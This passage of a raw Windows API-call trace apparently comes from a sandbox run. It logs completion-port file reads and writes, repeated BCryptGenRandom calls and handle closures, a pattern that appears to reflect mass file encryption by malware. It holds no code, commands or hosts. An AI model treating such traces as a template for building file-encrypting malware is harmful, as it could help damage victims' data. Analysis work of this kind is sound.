out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.020] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1ad0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0142.020] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.031] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0142.031] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.034] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x22a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0142.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.041] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.041] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0142.041] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.041] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0142.042] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.042] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.042] free (_Block=0x3e305b8) [0142.042] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.042] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.042] free (_Block=0x1fa91d0) [0142.042] free (_Block=0x77d7a8) [0142.042] free (_Block=0x1fa90b8) [0142.042] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.042] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.043] CloseHandle (hObject=0x3cc) returned 1 [0142.043] free (_Block=0x3ef0008) [0142.043] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.044] CloseHandle (hObject=0x338) returned 1 [0142.044] free (_Block=0x3df0008) [0142.044] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.044] CloseHandle (hObject=0x308) returned 1 [0142.044] free (_Block=0x1ff1e60) [0142.044] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.059] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0142.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0142.060] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.060] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.060] free (_Block=0x3e305b8) [0142.060] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.060] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.060] free (_Block=0x1fa91d0) [0142.060] free (_Block=0x77d7a8) [0142.060] free (_Block=0x1fa90b8) [0142.060] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.071] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2fb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.080] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x36b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.090] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.102] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a88, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0142.111] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.177] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0142.178] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.195] CloseHandle (hObject=0x3cc) returned 1 [0142.195] free (_Block=0x1ff1e60) [0142.195] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.206] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0142.206] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.206] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0142.207] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.207] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.207] free (_Block=0x3e305b8) [0142.207] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.207] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.207] free (_Block=0x1fa91d0) [0142.207] free (_Block=0x77d7a8) [0142.207] free (_Block=0x1fa90b8) [0142.207] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0142.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.208] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1580, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.208] CloseHandle (hObject=0xec) returned 1 [0142.208] free (_Block=0x3d70450) [0142.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0142.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0142.229] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.229] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.229] free (_Block=0x3e305b8) [0142.230] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.230] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.230] free (_Block=0x1fa91d0) [0142.230] free (_Block=0x77d7a8) [0142.230] free (_Block=0x1fa90b8) [0142.230] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.232] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.248] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe3c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.255] CloseHandle (hObject=0x3cc) returned 1 [0142.255] free (_Block=0x3df0008) [0142.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.257] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x138c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.797] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.812] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x12b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0142.874] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.886] CloseHandle (hObject=0x3cc) returned 1 [0142.889] free (_Block=0x3df0008) [0142.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.926] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9d30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.953] CloseHandle (hObject=0x3cc) returned 1 [0142.953] free (_Block=0x3d70450) [0142.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.954] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xf0d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0142.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0143.670] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x45cb, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0143.769] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0143.776] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x7c70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0143.777] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0143.831] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x8a60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0143.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0144.772] CloseHandle (hObject=0x2a8) returned 1 [0144.773] free (_Block=0x3d70450) [0144.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0144.784] CloseHandle (hObject=0x2a4) returned 1 [0144.785] free (_Block=0x3df0008) [0144.785] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0144.800] CloseHandle (hObject=0x3cc) returned 1 [0144.800] free (_Block=0x3e70008) [0144.800] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0144.814] CloseHandle (hObject=0xec) returned 1 [0144.815] free (_Block=0x3ef0008) [0144.815] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0144.818] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0144.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0144.822] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x30a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0144.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0144.823] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0145.927] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2584, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0145.938] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0145.950] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x785c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0145.962] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0145.977] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x8780, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0145.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0145.988] CloseHandle (hObject=0x3cc) returned 1 [0145.988] free (_Block=0x3ef0008) [0145.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0145.995] CloseHandle (hObject=0x2a4) returned 1 [0145.995] free (_Block=0x3df0008) [0145.996] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0146.002] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x4b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0146.002] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0146.011] CloseHandle (hObject=0x170) returned 1 [0146.011] free (_Block=0x1ff1e60) [0146.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0146.021] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0146.021] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0146.032] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x674, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0146.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, 